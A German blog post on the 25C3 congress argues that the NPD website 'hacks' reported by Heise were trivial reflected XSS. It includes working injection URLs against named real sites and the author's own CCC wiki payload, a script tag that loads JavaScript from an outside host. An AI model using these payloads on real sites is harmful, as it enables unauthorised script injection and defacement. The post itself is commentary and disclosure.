Mein Beitrag der vergangenen Nacht war nur mein Betthupferl. :O)

Nun nochmal etwas eingehender zu dem was Heise da verzapft hat…
“25C3: NPD-Webseiten fest in Hackerhand” (heise.de)

Wer ist eigentlich dieser “Stefan Krempl”?
Nur eine Heise-Zwischen-den-Jahren-Aushilfskraft?!

Die verlinkten Beispiele aus dem Artikel sind alle samt XSS-Lücken und zwar der reflektiven Art, das heisst, das was in die URL injiziert wird wird im Browser wieder angezeigt. Das da nun z.B. die Seite der CDU innerhalb der Seite der NPD erscheint ist eher Zufall, weil das Scriptkiddie im Vollrausch etwas einfallslos war.

Die URL aus dem Beispiel ist
http://www.npd-sh.de/index.php?aktuell/index.php?http://www.cdu.de
sie könnte aber auch

• http://www.npd-sh.de/?http://www.rep.de/
• http://www.npd-sh.de/?http://verfassungsschutz.de/
• http://www.npd-sh.de/?http://bka.de/
• …

lauten. Wie man sieht ist es vollkommen unerheblich welche URL injiziert wird, was eben gerade das Merkmal dieser Lücke ist. Mit den anderen Beispielen aus dem Heise-Artikel verhält es sich ähnlich.

Selbst auf der Webseite des Pentagon haben Hacker auf dem Weg zum Meldungsarchiv Spuren des Kongresses hinterlassen.

Ist dann auch schon BILD-Niveau!

Es geht um diesen Link:
http://www.defenselink.mil/news/articles.aspx?SectionID=13%27%3E25C3
und? weida?

Da könnte auch
http://www.defenselink.mil/news/articles.aspx?SectionID=13%27%3EDER%20CCC%20IST%20DOOF
stehen… also auch nicht wirklich spannend…


Ist das schon Hacken was die Kongressteilnehmer da gemacht haben?

Naja, wenn ich eine Kaffeemaschine dazu überrede mir Tee zu kochen ist das auch schon Hacken. <g> Hacken ist eigentlich nur, etwas für einen anderen Zweck zu verwenden als wofür es gedacht ist, mehr nicht.

Diese “Hacks” aus dem Heiseartikel sind eher Skriptkiddie-Zeuch, wenn nicht gar nur Kinderkacke und ganz sicher nicht “fest in Hackerhand” – Kinderkacke ist oft eher Dünnschiss. :O)


Und mein “CCC-Hack” von letzter Nacht? Eher ein Beispiel dafür, wie einfach solche Lücken auszunutzen sind und das man an vielen Ecken im Internet auf sie trifft – ich muß allerdings zugeben das ich beim CCC nicht damit gerechnet hatte… Da habe ich die CCC-Jungs und -Mädels doch überschätzt, die kochen ihr Frühstücksei auch nur in der Kaffeemaschine. ;O)

Die Jungs und Mädels vom Chaos Computer Club (CCC) haben mal wieder einen Kongress, den “25. Chaos Communication Congress: nothing to hide”, veranstaltet und dabei einige WebSites gehackt. Speziell haben sie sich der WebSites und Server der NPD angenommen.

Heise schreibt von “25C3: NPD-Webseiten fest in Hackerhand” (heise.de)

Man kann nun geteilter Meinung sein, ob man es gut findet das beim 25C3 WebSites der NPD mit Defacements überzogen und die XSS-Links dazu veröffentlicht wurden. Aber was nun vollkommen indiskutabel und an Unseriösität der Veranstalter kaum noch zu überbieten ist, ist das Zugangsdaten der User und der Datenbanken veröffentlicht wurden. Solche Aktionen schaden dem CCC und dem Ruf der Hacker die nichts böses im Schilde führen und nur aufklären wollen.


Ich habe mal beim CCC selber nach Lücken geschaut, dort sieht es auch nicht so viel besser aus, als auf den WebSites über die sich diese CCC-Hacker lustig machen und deren Zugangsdaten sie veröffentlichen…

Der Screenshot ist mit folgendem verlinkt:
http://events.ccc.de/congress/2008/wiki/index.php?
title=Special:Recentchanges&action=edit&gen=js&useskin=
</style><script src=http://meingottundmeinewelt.de/xss/25c3.js></script><style>
Das JavaScript fügt nur etwas Defacement per CSS ein.

Auf den CCC-Seiten gibt es noch weitere Lücken, da ich aber kein CCC-Hacker bin…


Update:
MediaWiki ‘useskin’ Cross-Site Scripting Vulnerability (securityfocus.com)